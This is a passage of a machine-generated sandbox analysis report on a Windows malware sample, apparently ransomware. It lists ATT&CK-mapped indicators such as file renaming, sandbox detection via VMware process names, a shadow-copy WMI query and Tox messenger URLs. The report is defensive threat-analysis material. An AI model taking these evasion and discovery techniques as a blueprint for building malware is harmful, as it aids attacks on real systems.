file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\YYYYYYYYYYY\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-666", "type": 2, "relevance": 1, "name": "Able to identify sandbox environment running process", "description": "Found string \"VGAuthService.exe\" (Indicator: \"VGAuthService.exe\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp, 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")\n Found string \"vmtoolsd.exe\" (Indicator: \"vmtoolsd.exe\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp, 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"10787422564,2316,3147,,IsWow64Process,kernel32.dll,\"252:35:42.666\",RX=0,PX=0\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb787608e5220000f0fd7f9a5cd07700e0fd7fe0f5150044f0fd7f00000000400000003f0000001500000000f0fd7fd4f51500c15cd0776082d7771500000000f0fd7f9a5cd07700e0fd7ff8f515005789cf778083d7771317e775d8eb7876 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000200000000000000880000000000000008f61500459d71770000a900000000008000000002000000000016009c1dfd731cf615006c22fd7380000000d322fd73dcf0fd7338f61500741dfd73dcf0fd730000000068f7150000000000 (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM Win32_ShadowCopy\" (Indicator: \"select * from \"; Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"IsWow64Process\" with parameter \"4056\" - (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320036003900350065006500320037003100380030003800340064006200390031006600380035006500320035003600300034003000370038003900390065003100630037006600360039003300380066006400340065006100300031003100650039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bcf77eba2ef77d8eb7876ac011f0000001f0000000000000000001c00700002000000000000000000000000000000000000001d006b00020000000000000000000000606f1f0000000000200000000000000000000000 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000066006400340065006100300031003100650039002e006500780065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2bcf77bfa2ef77020000000c02a9000000a9003800460001000000000000000000000000000000000000003900350001000000000000000000000000000000000000005803620000000000 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4ecaef0fced150008f31500fcffab7300000000ca92ab7300f6ab73b56eaa7340edaef002000000fcddac7348d8ac730000000000000000000000000000000000000000000000000000000030ddac7300000000403caa7300000000dc33aa7328d8ac73000000000000000000000000000000000000000040edaef0e8f515005900ac73 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000cf77f3a2ef7702000000a401a9000000a9005001a90003000000548ca9005001a90000001f00000000001d006b005d00000000a2ef775001a900ac011f0038d86300200000006100000016008e0004000000506c1f00706d1f000850230018711f000000000061000061c400a900f60200f4606f1f00db4b3500000000008000000000000000f60200f438d8630000000000c0f515006870a90050f5150080f471770000a9000000000089f471772a332ef002000000c4f51500c0f515002cdeac7388f6150095e1cb77e3453500feffffff14f51500c83a7b7788f51500d58c7377 (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\3FACC153ED82A72695EE2718084DB91F85E2560407899E1C7F6938FD4EA011E9.EXE\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\3FACC153ED82A72695EE2718084DB91F85E2560407899E1C7F6938FD4EA011E9.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"OpenMutexW\" with parameter \"Global\\d603996df3a1ed67253bba5655942318\" - (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"kAES\" (Indicator: \"aes\"; Source: \"00000000-00004056.00000000.192882.00790000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"SELECT * FROM Win32_ShadowCopy\" (Indicator: \" Win32_Shadowcopy\"; Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\System32\\*.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter acmigration.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter acppage.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter acproxy.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter ActionCenter.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter ActionCenterCPL.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter ActionQueue.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter activeds.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter actxprxy.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter AdmTmpl.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adprovider.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adsldp.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adsldpc.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adsmsext.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adsnt.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter adtschema.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter advapi32.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter advpack.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter aecache.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter aeevts.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"FindNextFileW\" with parameter aeinv.dll (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"82831856727,328,3117,,FindNextFileW,kernel32.dll,\"252:44:34.696\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp\")\n Found reference to API \"155405280321,328,3117,,FindNextFileW,kernel32.dll,\"252:49:22.329\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"n?.fi\"\n Pattern match: \"https://tox.chat/download.html\"\n Pattern match: \"https://github.com/toktok/qtox/releases/download/v1.18.2/setup-qtox-x86_64-release.exe\"\n Pattern match: \"https://play.google.com/store/apps/details?id=ltd.evilcorp.atox&hl=en\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"https://tox.chat/download.html\" - Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp\")\n Found URL \"https://github.com/toktok/qtox/releases/download/v1.18.2/setup-qtox-x86_64-release.exe\" - Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp\")\n Found URL \"https://play.google.com/store/apps/details?id=ltd.evilcorp.atox&hl=en\" - Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp\")\n Found URL \"https://tox.chat/download.html\" - Source: \"00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")\n Found URL \"https://github.com/toktok/qtox/releases/download/v1.18.2/setup-qtox-x86_64-release.exe\" - Source: \"00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")\n Found URL \"https://play.google.com/store/apps/details?id=ltd.evilcorp.atox&hl=en\" - Source: \"00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.215055915176145", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Found potential IP address in binary/memory", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\" (Indicator: \"\\Device\\\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume1\\??\\Volume{dcbfaac3-d863-11e7-b9ff-806e6f6e6963}#\" (Indicator: \"\\Device\\\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\DosDevices\\C:\\??\\Volume{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\DosDevices\\C:\\??\\Volume{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}\" (Indicator: \"\\DosDevices\\\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-458", "type": 2, "relevance": 1, "name": "References device drivers used by rootkit 